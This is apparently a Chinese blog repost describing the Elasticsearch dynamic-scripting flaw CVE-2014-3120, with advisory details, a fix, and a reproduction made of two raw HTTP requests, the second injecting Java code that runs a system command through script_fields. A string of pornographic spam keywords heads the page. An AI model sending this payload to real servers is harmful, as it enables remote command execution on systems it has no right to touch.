日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

ElasticSearch 命令执行漏洞

發布時間:2023/12/24 windows 30 coder
生活随笔 收集整理的這篇文章主要介紹了 ElasticSearch 命令执行漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞編號:CVE-2014-3120

漏洞詳情

CVE編號 CVE-2014-3120 漏洞級別 中危6.8
標題 Elasticsearch默認配置允許動態腳本執行漏洞 披露時間 2014/07/29
漏洞總結 Elasticsearch 1.2版本及之前的默認配置啟用了動態腳本,攻擊者可以通過_search的source參數執行任意MVEL表達式和Java代碼。需要注意的是,只有在用戶沒有在獨立的虛擬機中運行Elasticsearch時,這才違反了供應商的安全策略。
利用路徑 NETWORK 利用難度 一般8.6
影響產品 elasticsearch
解決方案 升級Elasticsearch到1.2.1以上版本,或禁用動態腳本功能。建議將Elasticsearch運行在一個獨立的虛擬機中,以增強安全性。

漏洞復現

添加一條數據

POST /website/blog/ HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

執行命令

POST /_search?pretty HTTP/1.1
Host: 0.0.0.0:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

POC&EXP

github:POC-EXP/ElasticSearch 命令執行漏洞 at main · twsec-pro/POC-EXP (github.com)

yakit:cc5908ae-5ea5-4060-8f15-1da729b3fb8c

總結

以上是生活随笔為你收集整理的ElasticSearch 命令执行漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。